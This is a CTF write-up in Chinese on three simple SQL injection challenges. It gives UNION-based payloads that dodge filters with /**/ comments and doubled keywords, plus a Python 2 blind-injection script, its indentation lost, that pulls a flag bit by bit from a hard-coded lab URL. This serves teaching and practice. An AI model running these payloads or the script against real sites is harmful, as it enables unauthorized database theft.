简单的SQL注入1,2
知识点:
空格用/**/或者()代替
可以把关键字重复一遍防止字符过滤
获取数据库名:
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
获取数据库表名:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
获取所有列名:
1' unionunion selectselect column_name fromfrom information_schema.columns wherewhere '1'='1
最终注入:1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/1='1
简单的SQL注入3
使用盲注逐个字符地遍历出 flag 的值
#!/usr/bin/python
#coding=utf-8
#Author = One
import requests
def main():
"""Recover the flag one character at a time via boolean-based blind SQL injection.

Every character costs 8 HTTP requests, one per bit: the injected ``if(...)``
makes the response contain 'Hello!' only when the tested bit of the
character is set, so the page content (not an error) is the oracle.
Takes no arguments; prints each recovered character as soon as it is
known and the whole flag once a 0x00 byte (end of string) is reached.
Python 2 only (``print`` statement).

NOTE(review): the indentation of this listing was lost; the nesting below
(inner loop over j inside the loop over i, the post-loop ``if``) is
inferred from the loop/branch keywords -- confirm against the original.
NOTE(review): from a defender's view this traffic is distinctive: hundreds
of near-identical requests to one endpoint whose parameter differs only
in small integers, many of them 'failing' -- easy to spot in access logs.
"""
# Count of consecutive zero bits; it is reset whenever a 1 bit is seen,
# so reaching 8 means the last whole character was 0x00.
n = 0
# Bits of the character currently being recovered, most significant first.
binary = ""
# Characters recovered so far.
flag = ""
for i in range(1,1000):   # 1-based position inside the flag (MySQL substring is 1-based)
for j in range(8):   # test bit j (value 2**j) of the character at position i
# Hard-coded target URL; only i and j vary between requests.
# '%26' is a URL-encoded '&' (bitwise AND on the ASCII code), '%23' a '#'
# that comments out the remainder of the original query.
url = "http://ctf5.shiyanbar.com/web/index_3.php?id=1' and 1=if((ascii(substring((select flag from flag),"+str(i)+",1))%26"+str(2**j)+")="+str(2**j)+",1,0) %23"
request = requests.get(url)   # NOTE(review): no timeout or error handling; a network failure aborts the whole run
if(request.text.find('Hello!') != -1):   # 'Hello!' present -> the injected if() took the true branch -> bit is 1
binary = '1'+binary   # bits arrive LSB-first, so prepend to keep MSB-first order
n = 0
else:
binary = '0'+binary
n += 1
# All 8 bits collected: emit the character (trailing comma suppresses the newline).
print chr(int(binary,2)),
flag += chr(int(binary,2))
binary = ""
if(n >= 8):   # eight zero bits in a row: the character was 0x00, the string has ended
print "\n"+flag
break
# Script entry point: run the extraction only when executed directly, not on import.
if __name__ == "__main__":
    main()